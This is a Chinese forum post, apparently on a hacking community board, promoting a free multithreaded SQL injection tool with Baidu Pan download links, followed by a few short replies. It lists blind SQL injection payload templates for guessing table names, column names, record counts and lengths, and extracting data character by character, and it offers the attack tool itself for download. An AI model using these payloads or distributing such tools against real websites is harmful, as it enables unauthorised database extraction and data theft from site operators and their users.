其实想说的都在readme里面,简单介绍一下吧
界面就是这样的,这是我们做的加强版,支持多线程,这个就是我在红盟说的正式版,现在没过春节免费发出了主要是想让大家找找bug,看看写的怎么样
软件介绍:这些手注最基础的相信大家看的懂
猜解表名(表段)用法and exists (select * from [表段])
猜解字段用法and exists (select [字段] from [表段])
猜解记录数用法and (select count(字段) from 表名)=记录数
猜解第一条记录长度用法and (select top 1 len(字段) from 表名)>长度
猜解第2条记录用法and (select top 1 len(字段) from 表名 where 字段 not in (select top 第几条记录 字段 from 表名))=记录
猜解内容用法and (select top 1 asc(mid(字段,N,1)) from 表名)=asc
不过多做解释,当域名爆破不出来时,可以把备用字典里的字段与自带字典查重后添加
部分机型运行会卡死,一是清理c盘缓存,二是清理运行内存,三是兼容的问题,还是建议在虚拟机里使用
此工具用于网络的友情渗透和漏洞检测,不适用于真正的渗透测试,此版本功能较少,还是建议去sqlmap,因为本软件不支持盗取,传马,打包等功能
附上下载链接
测试开放版(非加强):链接:https://pan.baidu.com/s/1HPAflId98nVvSDB_ZDrZBg?pwd=gvd9
春节加强版:链接:https://pan.baidu.com/s/1l8RLKDY7wNqY-uvIh4WuEA?pwd=tpo1提取码:tpo1
链接失效了直接评论,不用登录
咋没人呢
回复获得
哈哈哈